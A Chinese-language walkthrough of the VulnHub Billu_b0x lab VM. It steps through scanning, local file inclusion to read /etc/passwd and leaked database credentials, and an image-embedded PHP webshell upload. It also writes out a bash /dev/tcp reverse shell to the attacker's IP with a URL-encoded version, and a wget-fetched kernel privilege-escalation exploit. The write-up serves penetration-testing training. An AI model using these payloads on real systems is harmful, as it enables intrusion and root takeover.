vulhub靶机Billu_b0x

╰半橙微兮° 2022-08-30 15:48 374阅读 0赞

### 文章目录 ###

*   *  第一部分 靶机说明
     *   *  靶机地址
         *  靶机说明
         *  目标
         *  环境搭建
     *  第二部分 信息收集
     *   *  第一步 主机扫描
     *  第二步 端口扫描
     *   *  第三步 访问80端口
     *  第三部分 漏洞查找和文件包含利用
     *   *  漏洞挖掘思路
         *  第一步 扫描目录
         *  第二步 访问 /add
         *  第三步 访问test
         *  第四步 尝试文件包含
         *  第五步 使用post方法读取文件，进行代码审计
         *  第六步 in.php文件
         *  第七步 使用密码登陆数据库
     *  第四部分 通过文件上传获取shell
     *   *  第一步 登陆web界面
         *  第二步代码审计
         *  第三步 查看图片，存在目录浏览
         *  第四步 文件上传
         *  第五步 上传cmd命令来执行图片马
         *  第六步 cmd的利用
     *  第五部分 提权
     *   *  成功获取shell
         *  进入交互式shell,并查看版本
         *  查看文件
         *  内核提权
     *  摘抄

## 第一部分 靶机说明 ##

### 靶机地址 ###

https://download.vulnhub.com/billu/Billu\_b0x.zip

### 靶机说明 ###

虚拟机难度中等，使用ubuntu（32位）,其他软件包有：
    PHP+apache+MySQL

### 目标 ###

Boot to root：从Web应用程序进入虚拟机，并获得root权限。

### 环境搭建 ###

*  靶机：使用VMWare打开虚机，网络连接方式设置为net，靶机自动获取IP。
 *  攻击机：kali linux 2

## 第二部分 信息收集 ##

### 第一步 主机扫描 ###

nmap -sP 192.168.2.1/24
    获得靶机地址：
    192.168.2.55

![在这里插入图片描述][476928867baf957e7a2069efa6fa02cb.png]

## 第二步 端口扫描 ##

nmap -p1- -A 192.168.2.55 -oN billu.txt
    （使用nmap扫描1-65535全端口，并做服务识别和深度扫描（加-A参数），扫描结果保存到txt文件）
    发现开放22和80端口

![在这里插入图片描述][49e6043719a1ebdc350f679f4227b334.png]

### 第三步 访问80端口 ###

http://192.168.2.55/

![在这里插入图片描述][455b018828c947065b9baee15f35d710.png]

## 第三部分 漏洞查找和文件包含利用 ##

### 漏洞挖掘思路 ###

*  SQL注入：首页提示注入，想办法注入成功。
 *  暴破目录：用DirBuster暴破，看是否有新网页，找新漏洞；
 *  漏洞扫描：暴破的新网页，送进AWVS或APPScan扫漏洞；
 *  手动挖掘：暴破的新页面，通过Firefox挂burp代理，在burp中观察Request和Response包，手动找漏洞；
 *  查看每个网页的源码，看是否有提示；。
 *  如得到用户名，密码，尝试登录ssh，如能连接上，无需反弹shell了

### 第一步 扫描目录 ###

dirb http://192.168.2.55
    直接拿御剑扫描后台

![在这里插入图片描述][64ee5236ddb9a112ac6ca72c8d2f8a64.png]

### 第二步 访问 /add ###

http://192.168.2.55/add
    发现是个文件上传的，多次尝试无果，猜测可能该页面是纯静态页面，用来迷惑攻击者

![在这里插入图片描述][30da344a164252f194e05b61e1cbc281.png]

### 第三步 访问test ###

http://192.168.2.55/test.php
    'file' parameter is empty. Please provide file path in 'file' parameter
    发现需要参数file=
    想到文件包含

![在这里插入图片描述][04143b030fff0ba4123b8813e340d21f.png]

### 第四步 尝试文件包含 ###

http://192.168.2.55/test.php?file=../../.../../etc/password
    发现不成功
    使用post提交

![在这里插入图片描述][03a61e88fc942895d5bbf97eec94aa58.png]  
![在这里插入图片描述][57cb540b9ef33fef0d92c73a79154fc4.png]

### 第五步 使用post方法读取文件，进行代码审计 ###

file=c.php
    file=../../../../../etc/passwd
    $conn = mysqli\_connect("127.0.0.1","billu","b0x\_billu","ica\_lab");

![在这里插入图片描述][c63bcdd6f96477502cb163992016f0ad.png]  
![在这里插入图片描述][f80e0158266cb6a585ed1658e4d1ed31.png]  
![在这里插入图片描述][931deb559ec557c25f455e8ebf308d63.png]

![在这里插入图片描述][45a067eb854c01aa00dc525cbdebba69.png]  
![在这里插入图片描述][fb307ad15fa84f64d8c31bb9f1e17371.png]

### 第六步 in.php文件 ###

http://192.168.2.55/in.php

![在这里插入图片描述][33a35d517b6dc55d224497100cfbc037.png]

### 第七步 使用密码登陆数据库 ###

http://192.168.2.55/phpmy/
    用户名：billu
    密码：b0x\_billu
    数据库名：ica\_lab
    发现账号和密码： 用户名：biLLu，密码：hEx\_it

![在这里插入图片描述][602a1a4e75877449393ac495c40168cb.png]  
![在这里插入图片描述][8cd233977fdd8a8c19d243314a92cd30.png]  
![在这里插入图片描述][14d479b2d596c67065b6d34394883239.png]

## 第四部分 通过文件上传获取shell ##

### 第一步 登陆web界面 ###

用户名：biLLu，密码：hEx\_it
    http://192.168.2.55/panel.php

![在这里插入图片描述][229047740baf1d9803a6792d295b2f65.png]  
![在这里插入图片描述][4b9b4917fd3a08f343b31a79940e1a64.png]

### 第二步代码审计 ###

file=panel.php
    发现panel.php存在本地文件包含漏洞

![在这里插入图片描述][561c29f24fcac9076f0dc4f19cda8f2a.png]

### 第三步 查看图片，存在目录浏览 ###

http://192.168.2.55/uploaded\_images/

![在这里插入图片描述][0a467311ec3e75814d4d131a5c2a8ee5.png]  
![在这里插入图片描述][6e6f8654934707efe2076d0180204ee8.png]

### 第四步 文件上传 ###

上传成功，但是无法用工具连接

![在这里插入图片描述][81d2db4ba3f96183c95b983631f78157.png]![在这里插入图片描述][010b7a1d9ecbe8e32ba3baeb8c5b48cc.png]

### 第五步 上传cmd命令来执行图片马 ###

copy jack.jpg/b+cmd.php/a cmd.jpg
    或者直接在图片结尾添加cmd命令

![在这里插入图片描述][54292d17b45af2fb01892308cfa7c651.png]  
![在这里插入图片描述][ad374b4ed83c86a3a9d2467e03eda533.png]

### 第六步 cmd的利用 ###

？cmd=cat%20/etc/passwd;ls
    load=刚才上传的cmd目录
    使用cmd反弹shell到kali去监听
    echo "bash -i >& /dev/tcp/192.168.2.54/777 0>&1" | bash
    url编码：%65%63%68%6f%20%22%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%36%30%2e%31%32%39%2f%37%37%37%20%30%3e%26%31%22%20%7c%20%62%61%73%68
    nc -lvvp 777

![在这里插入图片描述][cf121f62acf52563d2d0309c351ca48b.png]  
![在这里插入图片描述][9c4f37e2c16d6eacfa0c685374c17c24.png]

## 第五部分 提权 ##

### 成功获取shell ###

![在这里插入图片描述][3fcef4854e879534bef683ff34338b0f.png]

### 进入交互式shell,并查看版本 ###

python -c 'import pty;pty.spawn("/bin/bash")'
    whoami
    id
    uname -a
    cat /etc/issue

![在这里插入图片描述][83aaea60493109695607b0ddb3a8482f.png]

### 查看文件 ###

ls
    cd phpmy
    ls
    cat config.inc.php

![在这里插入图片描述][aa2a9545195db64e8be4830e251f9930.png]  
![在这里插入图片描述][4215a2aa762ead0a58394afd1d651fb5.png]

### 内核提权 ###

searchsploit Ubuntu 12.04
    cp /usr/share/exploitdb/exploits/linux/local/37292.c /root/
    
    
    cd tmp
    wget http://192.168.2.52:8080/37292.c
    gcc 37292.c -o exp
    chmod +x exp
    ./exp
    whoami

![在这里插入图片描述][0b6c4845e642ae6ec2fc3e73d652395a.png]  
![在这里插入图片描述][92eb24bb5a2e235a2ad0086b08649c51.png]

## 摘抄 ##

--------------------

一个人真正的高贵，  
在于灵魂的丰盈。  
就像一位作家说的：“  
我们时时保有善良、宽容、明朗的心性，  
不要说为他人送一轮明月，  
同时送出许多明月都是可能的，  
因为明月不是相送，  
而是一种相映，  
能映照出互相的光明。

--------------------

[476928867baf957e7a2069efa6fa02cb.png]: /images/20220829/c7502bbe41df4b8bb26b290a16f8099d.png
[49e6043719a1ebdc350f679f4227b334.png]: /images/20220829/1a7fd6fdd65b42008aa0245880068399.png
[455b018828c947065b9baee15f35d710.png]: /images/20220829/b49a80f8a3264b66867cc89a87c382a7.png
[64ee5236ddb9a112ac6ca72c8d2f8a64.png]: /images/20220829/84c63193c9f140339427c484a38cd727.png
[30da344a164252f194e05b61e1cbc281.png]: /images/20220829/95108b4bd7ad41e89f6af65c56ec0aac.png
[04143b030fff0ba4123b8813e340d21f.png]: /images/20220829/e99397390ea74c3895c41b9a6ce0335a.png
[03a61e88fc942895d5bbf97eec94aa58.png]: /images/20220829/593c4f0f0cef47dfadbb4e092127b388.png
[57cb540b9ef33fef0d92c73a79154fc4.png]: /images/20220829/7502029718bd4bdebd120a1ea59e7ab9.png
[c63bcdd6f96477502cb163992016f0ad.png]: /images/20220829/aee968f0990c47c987916fcb07244820.png
[f80e0158266cb6a585ed1658e4d1ed31.png]: /images/20220829/a9718811e78c4753b55f706fe94f51df.png
[931deb559ec557c25f455e8ebf308d63.png]: /images/20220829/6ed5a583c663467fb9f0a7caa796b201.png
[45a067eb854c01aa00dc525cbdebba69.png]: /images/20220829/43e59f33424b4c6d9d451a7fec17c343.png
[fb307ad15fa84f64d8c31bb9f1e17371.png]: /images/20220829/49c594fbb6f24ce6bc6799133d0f3254.png
[33a35d517b6dc55d224497100cfbc037.png]: /images/20220829/6e35ed79531547bfa5c106ad2f28e191.png
[602a1a4e75877449393ac495c40168cb.png]: /images/20220829/ab173a5b020e48bdbaa84c85119174fe.png
[8cd233977fdd8a8c19d243314a92cd30.png]: /images/20220829/f6b355fc3de04afcb5ee8c1dc5dcd346.png
[14d479b2d596c67065b6d34394883239.png]: /images/20220829/4c3ab72fc57b480fb916c8ca7c49ad95.png
[229047740baf1d9803a6792d295b2f65.png]: /images/20220829/36c8d585869143e3abdf37c548f6a1b1.png
[4b9b4917fd3a08f343b31a79940e1a64.png]: /images/20220829/ab717c7552664bdf9cd880406c0748e3.png
[561c29f24fcac9076f0dc4f19cda8f2a.png]: /images/20220829/9b87fdf0dec548bdbda5d592a2b1e997.png
[0a467311ec3e75814d4d131a5c2a8ee5.png]: /images/20220829/384ac2c4b22142938786b5ce878f6125.png
[6e6f8654934707efe2076d0180204ee8.png]: /images/20220829/a2a9f1531e0a4e848878fcfa9c085607.png
[81d2db4ba3f96183c95b983631f78157.png]: https://img-blog.csdnimg.cn/img_convert/81d2db4ba3f96183c95b983631f78157.png
[010b7a1d9ecbe8e32ba3baeb8c5b48cc.png]: /images/20220829/5c6ac37007724a3a94f83ba485e25a5c.png
[54292d17b45af2fb01892308cfa7c651.png]: /images/20220829/5f63c2f536ec437b9212a72d9ded9b87.png
[ad374b4ed83c86a3a9d2467e03eda533.png]: /images/20220829/7061c0fef61742b8a58c0d036312f7c3.png
[cf121f62acf52563d2d0309c351ca48b.png]: /images/20220829/e7ead07b322942d6bff2de0f6c5375aa.png
[9c4f37e2c16d6eacfa0c685374c17c24.png]: /images/20220829/a2ebcf5761864240bb00c8117dc0dae2.png
[3fcef4854e879534bef683ff34338b0f.png]: /images/20220829/32b641ab64dd45048062f25ab1b5456f.png
[83aaea60493109695607b0ddb3a8482f.png]: /images/20220829/5d68b2b311d24b17bf52404ed7fc5f08.png
[aa2a9545195db64e8be4830e251f9930.png]: /images/20220829/7e453bf751054b4b9b8e0dcbb0a4c12e.png
[4215a2aa762ead0a58394afd1d651fb5.png]: /images/20220829/aefa5b55c8364deda2bc0fabef1b955e.png
[0b6c4845e642ae6ec2fc3e73d652395a.png]: /images/20220829/99330088434c4096ab88cb3e065ad7e3.png
[92eb24bb5a2e235a2ad0086b08649c51.png]: /images/20220829/2e8e40b6316442458cf6326f9bf27fb6.png